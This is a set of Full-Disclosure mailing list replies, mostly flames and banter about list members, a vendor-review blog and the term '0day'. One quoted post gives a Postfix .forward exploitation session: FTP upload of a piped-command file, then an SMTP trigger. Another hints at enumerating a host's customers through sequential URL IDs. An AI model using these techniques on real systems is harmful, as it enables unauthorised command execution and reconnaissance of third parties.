Re: [Full-disclosure] JaPCrypt
Shut up Valdis! On 2/6/08, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > > On Wed, 06 Feb 2008 03:59:30 PST, coderman said: > > > since psk without key distribution nor secure secret exchange does not > > solve the problems that HTTPS solves, to say this is useful in > > situations where HTTPS is not available is disingenuous. > > Sure. So you e-mail the shared secret in a PGP or S/MIME encrypted mail. > > So saying that it doesn't work because there's no secure secret exchange > is disingenuous as well. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gadi Bashing, enough already....
Thanks man, I was really starting to get down on Gadi before you explained how smart he is. On 1/17/08, Richard Golodner <[EMAIL PROTECTED]> wrote: > >I have been friends with Gadi through email for many years now and > he needs to have someone represent for him. He is a good guy, signs his > own > email instead of the hushmail or Gmail mask. > On top of all that he is also a knowledgeable and friendly guy. He > does a great job exploring and reporting the areas of interest to him and > has helped many people remove bot-net problems from their own nets. Give > the > guy a break, he is a good dude. >P.S. Punks do not know what federal agencies read these dumb ass > lists but should be aware that email threats can be taken very far in > courts > these days. Ask old Kevin! > > Richard Golodner > [EMAIL PROTECTED] > PGP 0x50F20D0C > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Cybertrust ( C + )
Ignorance is bliss, let him keep smiling. On 12/20/07, SecReview <[EMAIL PROTECTED]> wrote: > > Don, the origional poster is anonymous so its not actually that > funny. > > > On Thu, 20 Dec 2007 14:59:01 -0500 don bailey > <[EMAIL PROTECTED]> wrote: > >SecReview wrote: > >> Awesome, > >> ... would you be willing to > >> answer a few questions that we have so that we can revise our > >post? > >> ... and we'd keep you anonymous. > >> > > > >This is the most comedic statement on full disclosure this month. > >I, too, will ask you publicly for information that I will then > >say is "completely anonymous when I repost". > > > >D > Regards, > The Secreview Team > http://secreview.blogspot.com > > -- > Click for the hottest computer games. > > http://tagline.hushmail.com/fc/Ioyw6h4c5brEaiBtWVaY5EthEQQcN193kGB0iPvERBbexWF6EMgTV2/ > Professional IT Security Service Providers - Exposed > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers -Exposed] Cybertrust ( C + )
Isn't ANY review subjective to opinion?I do not understand the basis of
this flame. It appears to me that a lot of the reviews on this site offer
some great insight into the companies being presented. Granted it is an
opinion, but that is what a blog is isn't it?
On 12/20/07, c0redump <[EMAIL PROTECTED]> wrote:
>
> Exactly. Your 'grading' is based on your personal opinion.
>
> Do us all a favour and get a proper job.
>
> - Original Message -
> From: "guiness.stout" <[EMAIL PROTECTED]>
> To:
> Sent: Thursday, December 20, 2007 2:05 PM
> Subject: Re: [Full-disclosure] [Professional IT Security Providers
> -Exposed]
> Cybertrust ( C + )
>
>
> > I'm not really clear on how you are grading these companies. I've had
> > no personal experience with them but I don't decide a companies
> > quality of work simply by their website and what information I get
> > from some customer support person. These "grades" seem pointless and
> > frankly unfounded. You should reword your grading system to specify
> > the ease of use of their websites and not the service they provide.
> > Especially if you haven't ordered any services from them. I'm not
> > defending anyone here just pointing out some flaws in this "grading."
> >
> > On Dec 20, 2007 12:11 AM, secreview <[EMAIL PROTECTED]> wrote:
> >> One of our readers made a request that we review Cybertrust
> >> ("http://www.cybertrust.com";). Cybertrust was recently acquired by
> >> Verizon
> >> and as a result this review was a bit more complicated and required a
> lot
> >> more digging to complete (In fact its now Cybertrust and Netsec). Never
> >> the
> >> less, we managed to dig information specific to Cybertrust out of
> Verizon
> >> representatives. We would tell you that we used the website for
> >> information
> >> collection, but in all reality the website was useless. Not only was it
> >> horribly written and full of marketing fluff, but the services were not
> >> clearly defined.
> >>
> >> As an example, when you view the Cybertrust services in their drop down
> >> menu
> >> you are presented with the following service offerings: Application
> >> Security, Assessments, Certification, Compliance/Governance,
> Consulting,
> >> Enterprise Security, Identity Management Investigative Response
> >> /Forensics,
> >> Managed Security Services, Partner Security Program Security Management
> >> Program, and SSL Certificates. The first thing you think is "what the
> >> hell?"
> >> the second is "ok so they offer 12 services".
> >>
> >> Well as you dig into each service you quickly find out that they do not
> >> offer 12 services, but instead they have 12 links to 12 different pages
> >> full
> >> of marketing fluff. As you read each of the pages in an attempt to wrap
> >> your
> >> mind around what they are offering as individually packaged services
> >> you're
> >> left with more questions than answers. So again, what the hell?
> >>
> >> Here's an example. Their "Application Security" service page does not
> >> contain a description about a Web Application Security service. In
> fact,
> >> it
> >> doesn't even contain a description about a System Software/Application
> >> security service. Instead it contains a super high level, super vague
> and
> >> fluffy description that covers a really general idea of "Application"
> >> security services. When you really read into it you find out that their
> >> Application Security service should be broken down into multiple
> >> different
> >> defined service offerings.
> >>
> >> Even more frustrating is that their Application Security service is a
> >> consulting service and that they have a separate service offering
> called
> >> Consulting. When you read the description for Consulting, it is also
> >> vague
> >> and mostly useless, but does cover the "potential" for Application
> >> Security.
> >>
> >> So, trying to learn anything about Cybertrust from their web page is
> like
> >> trying to pull teeth out of a possessed chicken. We decided that we
> would
> >> move on and call Cybertrust to see what we could get out of them with a
> >> conversation. That proved to be a real pain in the ass too as their
> >> website
> >> doesn't list any telephone numbers. We ended up calling verizon and
> after
> >> talking to 4 people we finally found a Cybertrust representative.
> >>
> >> At last, a human being that could provide us with useful information
> and
> >> answers to our questions about their services. We did receive about 2mb
> >> of
> >> materials from our contact at Cybertrust, but the materials were all
> >> marketing fluff, totally useless. That being said, our conversation
> with
> >> the
> >> representative gave us a very clear understanding of how Cybertrust
> >> delivers
> >> there services. In all honesty, we were not all that impressed.
> >>
> >> Cybertrust does perform their own Vulnerability Research and
> Development
> >> (or
> >> so we were told) under the umbrella of ICSAlabs which they own. Usually
Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
And why not replace .profile in that home directory and await the next login? This "exploit" is pretty basic and in fact write access to a ~ through FTP could be used in many ways to "exploit" the machine. I see no real issue here... On 12/14/07, Adam N <[EMAIL PROTECTED]> wrote: > > No, the idea is that you are a user with no login access, only FTP. > By doing this, you get shell access (with sane privileges, thankfully) > when you're supposed to only have FTP. > > On Dec 13, 2007 2:34 PM, Fredrick Diggle < [EMAIL PROTECTED]> wrote: > > > You have write perms on a users home directory and this was the best way > > you could come up with to execute commands? Please send me details on your > > recipe for boiled water. Be sure to gzip it though as I imagine it is > > several pages long. > > > > YAY! > > > > > > On Dec 13, 2007 2:18 PM, kcope <[EMAIL PROTECTED]> wrote: > > > > > Small Design Bug in Postfix - REMOTE > > > > > > There's a small issue on how Postfix forwards mails. > > > A user can have a .forward file in her home directory. > > > Inside this file she can specifiy an alternative recipient > > > or use aliasing to execute commands when mail is received. > > > >From the manpage ALIASES(5) > > > "aliases - Postfix local alias database format" > > > > > > |command > > > Mail is piped into command. Commands that contain > > > special characters, such as whitespace, should be > > > enclosed between double quotes. See local(8) for > > > details of delivery to command. > > > > > > When the command fails, a limited amount of command > > > output is mailed back to the sender. The file > > > /usr/include/sysexits.h defines the expected exit > > > status codes. For example, use "|exit 67" to simu- > > > late a "user unknown" error, and "|exit 0" to > > > implement an expensive black hole. > > > > > > This is fine since postfix properly drops privileges before > > > executing the command. > > > The Problem with executing commands via .forward files is that > > > if someone manages to place a file into ones home directory and > > > just sends a file to the mailserver she can execute commands > > > even when she's not supposed to or does not have the privileges. > > > > > > Here is an example exploitation session, the user 'rootkey' > > > only has ftp access with write permissions and no other privileges > > > than that. > > > > > > Login to FTP server > > > >telnet box 21 > > > >USER rootkey > > > >PASS rootkey123 > > > > > > > > Put .forward file with following contents into the home directory of > > > user 'rootkey'. > > > > > > ---snip--- > > > |touch /tmp/XXX > > > ---snip--- > > > > > > >put .forward > > > > > > Now send an email to user rootkey. > > > > > > >telnet box 25 > > > >mail from: rootkey > > > >rcpt to: rootkey > > > >data > > > >. > > > > > > RESULT: > > > > > > [EMAIL PROTECTED]:~$ ls /tmp/testXXX > > > /tmp/testXXX > > > > > > > > > signed, > > > > > > - -kcope/2007 > > > > > > -- > > > GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS. > > > Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail > > > > > > > > > ___ > > > Full-Disclosure - We believe in it. > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DHS need to get on top of this right now
Stop spamming the list with useless garbage and maybe some will respect rather than hate? Just a thought... -E On 10/24/07, worried security <[EMAIL PROTECTED]> wrote: > > I'm sorry everyone I was just trying to highlight a valid point, i didn't > expect a flame war to errupt. > > The DHS need to ban ISP's from talking about infrastructure security in > public places. it should be classified information don't you all think? > > Just because Nanog has been offending for years by talking about similar > subjects doesn't mean its ok and action should be taken now to prevent the > continuation of critical infrastructure security recovery be talked about in > public. > > For anyone who does care about what i'm talking about, I apologize about > the trolls in my thread who told me I worked in Mc Donalds and KFC. > > I know not everyone hates me so perhaps we can have mature discussions > about the DHS and Nanog instead of bashing each other saying I work in Mc > Donalds, KFC etc. > > n3td3v > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New term "RDV" is born
How about SPB - (Stupid Pointless Bullshit) The noise level on this list is pathetic anymore On 9/28/07, Troy <[EMAIL PROTECTED]> wrote: > > Wouldn't UDV be more appropriate, for unpatched disclosed vulnerability? > The "R" in RDV means recent. I wouldn't consider a two-month old, but still > unpatched, vulnerability to be recent, so I wouldn't really be able to call > it an RDV. I would, however, be able to call it a UDV. > > Another option would be EDV, for exploitable disclosed vulnerability, or > even just UV or EV. Why do we need to bring up the point that it's > disclosed? How could we be discussing an undisclosed vulnerability? > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] defining 0day
At what point does it honestly matter? The term will be used however it is seen fit to use by the person using it. Trying to redefine it how you see fit or recast it into what you believe is just waisting time and effort. Why not do something useful? This debate takes the same turn of events as the debate over the term hacker. In the end it matters not what you think and what you want to believe. The media and money will determine our precious defination. You will then be forced to decide if you term your code 0day, based on that defination. Not if you determine the difination of 0day based on your code. On 9/25/07, Brian Loe <[EMAIL PROTECTED]> wrote: > > On 9/25/07, Gadi Evron <[EMAIL PROTECTED]> wrote: > > > No longer good enough. > > > > We can get a press scare over a public vuln release, or a wake-up call. > > > > I think we can do better as an industry. > > > > Who, then, rewrites all of the reference material? And doesn't any new > definition simply become definition number 2 in Webster? > > Is it really the definition that is lacking or is the use of the word > at issue? Seems to me, from the beginning of this debate, that its the > usage. Far easier to reform the "zero day process" (disclosure, etc.) > than to redefine the term "zero day". The term is owned by the public, > the process is owned by those who follow it, the industry. > > Couldn't a formal process be developed that does the defining/labeling > of a particular disclosure? > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to discover customers of hosting company for n3td3v.com
Carolyn Meinel wrote: That silly post about n3td3v.com led to fun playtimes with the Scottsdale, AZ web farm that hosts it. Name:n3td3v.com Address: 64.202.167.129 Nslookup of 64.202.167.129 gives: Name:pwdynamic-v02.prod.mesa1.secureserver.net Address: 64.202.167.120 A traceroute of 64.202.167.129 gives its IP address as ip-64-202-167-129.secureserver.net. Want to know all the fun customers using websites on related secureserver.net servers? Insert numbers per examples: http://documents.secureserver.net/show/document.aspx?plvid=1&name=stats_eula (GoDaddy.com) http://documents.secureserver.net/show/document.aspx?plvid=2&name=stats_eula ... http://documents.secureserver.net/show/document.aspx?plvid=111702&name=stats_eula etc. How does one develop the procedure for uncovering all these users as noted above? That is left as an exercise for the student. Hint: it is trivial. Carolyn Meinel http://techbroker.com http://happyhacker.org 505-281-9675 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Whoa. Absolutely stunning. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
